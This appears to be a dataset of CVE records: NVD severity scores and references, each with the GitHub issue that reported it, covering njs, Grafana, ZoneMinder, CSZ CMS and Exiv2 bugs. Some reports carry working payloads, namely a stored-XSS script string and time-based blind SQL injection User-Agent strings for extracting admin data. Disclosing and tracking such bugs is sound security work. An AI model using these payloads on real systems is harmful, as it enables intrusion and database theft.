njs_vmcode_interpreter njs/njs_vm.c:159 #9 0x5566625ab693 in njs_vm_start njs/njs.c:594 #10 0x55666258e8a9 in njs_process_script njs/njs_shell.c:772 #11 0x556662587cc8 in njs_process_file njs/njs_shell.c:621 #12 0x556662587cc8 in main njs/njs_shell.c:283 #13 0x7f67abf81b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #14 0x556662589db9 in _start (/home/build/njs/build/njs+0x2bdb9) 0x5566629c2ab8 is located 40 bytes to the left of global variable '__compound_literal.29' defined in 'njs/njs_object.c:2284:18' (0x5566629c2ae0) of size 56 0x5566629c2ab8 is located 0 bytes to the right of global variable '__compound_literal.30' defined in 'njs/njs_object.c:2292:18' (0x5566629c2a80) of size 56 SUMMARY: AddressSanitizer: global-buffer-overflow nxt/nxt_utf8.c:72 in nxt_utf8_decode Shadow bytes around the buggy address: 0x0aad4c530500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aad4c530510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aad4c530520: 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 0x0aad4c530530: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9 0x0aad4c530540: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 =>0x0aad4c530550: 00 00 00 00 00 00 00[f9]f9 f9 f9 f9 00 00 00 00 0x0aad4c530560: 00 00 00 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 0x0aad4c530570: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 0x0aad4c530580: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 0x0aad4c530590: 00 00 f9 f9 f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 0x0aad4c5305a0: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3788==ABORTING ``` Found by [fluff](https://github.com/Samsung/Fluff)
global-buffer-overflow in nxt_utf8_decode nxt/nxt_utf8.c:72
https://api.github.com/repos/nginx/njs/issues/183/comments
5
2019-06-20T12:23:30Z
2019-07-02T14:04:00Z
https://github.com/nginx/njs/issues/183
458,626,122
183
455
CVE-2019-13068
2019-06-30T00:15:11.313
public/app/features/panel/panel_ctrl.ts in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/171500/Grafana-6.2.4-HTML-Injection.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/grafana/grafana/issues/17718" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/grafana/grafana/releases/tag/v6.2.5" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20190710-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://packetstormsecurity.com/files/171500/Grafana-6.2.4-HTML-Injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/grafana/grafana/issues/17718" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/grafana/grafana/releases/tag/v6.2.5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20190710-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "matchCriteriaId": "D02B16B4-30E7-4E47-B14F-C39981C88786", "versionEndExcluding": "6.2.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/grafana/grafana/issues/17718
[ "Third Party Advisory" ]
github.com
[ "grafana", "grafana" ]
You can inject image tags in panel drilldown links (via Title & url fields). There is no script injection as this already sanitized. But for these fields there is no need to have html here. Problem is here: https://github.com/grafana/grafana/blob/master/public/app/features/panel/panel_ctrl.ts#L269 Think using escape function when building the html there would solve it. Here is where you can replicate it <img width="775" alt="Screen Shot 2019-06-24 at 10 13 52" src="https://user-images.githubusercontent.com/10999/60002395-da9d0700-9668-11e9-9006-8ef57b543cd5.png">
HTML injection in panel links (drilldown)
https://api.github.com/repos/grafana/grafana/issues/17718/comments
3
2019-06-24T08:15:00Z
2020-04-22T12:30:08Z
https://github.com/grafana/grafana/issues/17718
459,752,656
17,718
456
CVE-2019-13072
2019-06-30T02:15:09.163
Stored XSS in the Filters page (Name field) in ZoneMinder 1.32.3 allows a malicious user to embed and execute JavaScript code in the browser of any user who navigates to this page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2642" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/47060" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ZoneMinder/zoneminder/issues/2642" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/47060" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zoneminder:zoneminder:1.32.3:*:*:*:*:*:*:*", "matchCriteriaId": "E5A2481D-4A45-48A2-B7DE-86C7D161F6EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ZoneMinder/zoneminder/issues/2642
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ZoneMinder", "zoneminder" ]
- ZoneMinder version 1.32.3 - Installed from PPA (Ubuntu Xenial) - Ubuntu 16.04 Xenial The 'Filters' page in ZoneMinder 1.32.3 is vulnerable to stored cross site scripting due to improper input sanitation in the 'Name' field. This is the latest version available in the Ubuntu 16.04 PPA. Please see attached screenshots. <img width="1423" alt="1" src="https://user-images.githubusercontent.com/7573003/59644743-e30ab480-9133-11e9-950c-93eab20fd308.png"> <img width="1434" alt="2" src="https://user-images.githubusercontent.com/7573003/59644744-e30ab480-9133-11e9-8d5f-bd3a68c01b59.png"> Steps to reproduce the behavior: 1. Go to the "Filters" page. 2. In the "Name" field paste in a javascript payload such as "<script>alert('Vulnerable')</script>" 3. Refresh the page to verify that the payload executes and remains stored through browser sessions. Expected behavior: The user input fields should be sanitized. Special characters should be limited or escaped to prevent injection of malicious code.
Stored Cross Site Scripting - Filters
https://api.github.com/repos/ZoneMinder/zoneminder/issues/2642/comments
5
2019-06-18T00:07:40Z
2019-12-26T10:04:57Z
https://github.com/ZoneMinder/zoneminder/issues/2642
457,200,985
2,642
457
CVE-2019-13086
2019-06-30T17:15:09.397
core/MY_Security.php in CSZ CMS 1.2.2 before 2019-06-20 has member/login/check SQL injection by sending a crafted HTTP User-Agent header and omitting the csrf_csz parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cskaza/cszcms/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cszcms:csz_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "2C1D9C9D-FB9B-4452-A8C2-E473488A2634", "versionEndExcluding": null, "versionEndIncluding": "1.2.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/cskaza/cszcms/issues/19
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cskaza", "cszcms" ]
**Title**: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2 **Discovered by**: @satuer from ABT Labs **Security**: high (dump database) **Software**: https://github.com/cskaza/cszcms/archive/1.2.2.zip **Description**: There is a high-risk time-based SQL injection vulnerability on the frontend login page(http://website/cszcms-1.2.2/member/login/check). Exploit this vulnerability could dump the whole database without login. When login in the frontend login page, if the csrf_csz parameter is removed or padded any string, a log will be recorded in the table 'login_logs' with reason 'CSRF Protection Invalid'. But the 'HTTP_USER_AGENT' field is used directly without any check when inserting the recorded. By constructing a special 'HTTP_USER_AGENT' field, this vulnerability can be exploited. files: cszcms/core/MY_Security.php ![微信截图_20190619211446](https://user-images.githubusercontent.com/42081938/59768660-57ca2400-92d7-11e9-8e8d-c99a90221916.png) login page: ![微信截图_20190619220158](https://user-images.githubusercontent.com/42081938/59772228-f6598380-92dd-11e9-85ea-5df6aa9204ec.png) login_logs: ![微信截图_20190619220437](https://user-images.githubusercontent.com/42081938/59772450-5819ed80-92de-11e9-9117-586b9b0e9a3c.png) If remove the csrf_csz paramete and login again, a 'CSRF Protection Invalid' log will be recorded. login_logs: ![微信截图_20190619220942](https://user-images.githubusercontent.com/42081938/59772750-f4dc8b00-92de-11e9-8451-b39b02e72572.png) **Exploit**: constructe a HTTP_USER_AGENT, remove the csrf_csz parameter: ![微信截图_20190619211804](https://user-images.githubusercontent.com/42081938/59770519-c5c41a80-92da-11e9-872c-657ef0f9ee69.png) User-Agent: '-( if( condition, sleep(5), 1) )-'', '192.168.1.11','time') # If the condition is true, the page will return after 5 seconds, otherwise it will return immediately. When UA is '-(if((substr((select email from user_admin limit 1), 1, 1)='1'),sleep(5),1))-'', '192.168.1.11','time') # The sql string is INSERT INTO login_logs (email_login, note, result, user_agent, ip_address, timestamp_create) VALUES ('', 'CSRF Protection Invalid', 'CSRF_INVALID', ''-(if((substr((select email from user_admin limit 1),1,1)='1'),sleep(5),1))-'', '192.168.1.11','time') #', '192.168.62.1', '2019-06-19 21:17:34.000000') The insert statement does not actually execute because the last column is not in the correct time format. But the sub select statement will execute, and the sleep will execute if condition is true. ![微信截图_20190619214438](https://user-images.githubusercontent.com/42081938/59770980-7cc09600-92db-11e9-86c9-1dca9b71b1b9.png) So, the records in the login_logs table will not increase. The IP will not be added to the blacklist and condition($count < 10 in line 45) is always true. Then you can dump whole database one by one byte. **Suggest**: Check UA before inserting UA into sql statement
Bug Report: Time-based blind SQL injection Vulnerability in cszcms/core/MY_Security.php on cszcms-1.2.2
https://api.github.com/repos/cskaza/cszcms/issues/19/comments
4
2019-06-19T14:18:29Z
2019-07-01T09:08:07Z
https://github.com/cskaza/cszcms/issues/19
458,042,220
19
458
CVE-2019-13108
2019-06-30T23:15:09.970
An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a zero value for iccOffset.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/789" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/Exiv2/exiv2/pull/794" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/789" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/Exiv2/exiv2/pull/794" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/789
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
There is a bug at [pngimage.cpp:469](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L469). If `iccOffset == 0`, which happens if `chunkLength == 0`, then Exiv2 crashes with a SIGSEGV. Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)): ![poc1](https://user-images.githubusercontent.com/4358136/56672050-a24f6b80-66ad-11e9-86d9-f0af10b008c9.png). You can run the PoC like this: ``` $ exiv2 poc1.png Segmentation fault (core dumped) ```
SIGSEGV in PngImage::readMetadata()
https://api.github.com/repos/Exiv2/exiv2/issues/789/comments
2
2019-04-24T15:24:45Z
2019-07-01T08:58:12Z
https://github.com/Exiv2/exiv2/issues/789
436,761,517
789
459
CVE-2019-13109
2019-06-30T23:15:10.017
An integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (SIGSEGV) via a crafted PNG image file, because PngImage::readMetadata mishandles a chunkLength - iccOffset subtraction.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/790" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull/795" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/790" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull/795" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/790
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
This issue is closely related to #789, but the consequences of this bug are different. The calculation of `chunkLength - iccOffset` at [pngimage.cpp:472](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/pngimage.cpp#L472) can have a negative integer overflow which leads to an 8GB memory allocation in `zlibToDataBuf`. Also, the zlib decompression is run on uninitialized memory beyond the end of the buffer, so there is a potential info leak vulnerability here. Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)): ![poc2](https://user-images.githubusercontent.com/4358136/56672813-fb6bcf00-66ae-11e9-9f14-6af4a90257c0.png). The simplest way to see the bug is to use `ulimit` to reduce the amount of available memory to less than 8GB: ``` $ ulimit -v 8000000 $ exiv2 poc2.png Uncaught exception: std::bad_alloc ```
Integer overflow, leading to very large allocation in PngImage::readMetadata()
https://api.github.com/repos/Exiv2/exiv2/issues/790/comments
1
2019-04-24T15:39:42Z
2019-07-01T09:01:35Z
https://github.com/Exiv2/exiv2/issues/790
436,769,374
790
460
CVE-2019-13111
2019-06-30T23:15:10.113
A WebPImage::decodeChunks integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (large heap allocation followed by a very long running loop) via a crafted WEBP image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Exiv2/exiv2/issues/791" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull/797" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Exiv2/exiv2/issues/791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/Exiv2/exiv2/pull/797" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/Exiv2/exiv2/issues/791
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Exiv2", "exiv2" ]
There is a bug at [webpimage.cpp:515](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/webpimage.cpp#L515). If `filesize < io_->tell()` then the subtraction overflows and the bounds check on `size` is ineffective. There is an additional problem in this function, which is that the error conditions are not checked after the calls to `io_->read`. Calls to `io_->read` should always be followed by calls to `io_->error()` and `io_->eof()`, to make sure that the buffer was read successfully. This means that the code does not notice that the file size is much smaller than the value of `size` would suggest. This has enabled me to write a PoC which causes exiv2 to run for almost a minute, scanning 4GB of uninitialized memory. Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)): ![poc1](https://user-images.githubusercontent.com/4358136/56674700-57842280-66b2-11e9-901a-bedeb60ba307.jpg). You can run the PoC like this to see the long-running behavior: ``` $ time exiv2 poc1.jpg File name : poc1.jpg File size : 28 Bytes MIME type : image/webp Image size : 0 x 0 poc1.jpg: No Exif data found in the file real 0m52.738s user 0m50.621s sys 0m2.108s ``` Or if you use `ulimit` to lower the maximum allocation size to less than 4GB then exiv2 will crash: ``` $ ulimit -v 4000000 $ exiv2 poc1.jpg Uncaught exception: std::bad_alloc ```
Integer overflow, leading to very large allocation in WebPImage::decodeChunks()
https://api.github.com/repos/Exiv2/exiv2/issues/791/comments
1
2019-04-24T16:03:00Z
2019-07-01T09:03:36Z
https://github.com/Exiv2/exiv2/issues/791
436,781,784
791
462
CVE-2019-13112
2019-06-30T23:15:10.160
A PngChunk::parseChunkContent uncontrolled memory allocation in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to an std::bad_alloc exception) via a crafted PNG image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
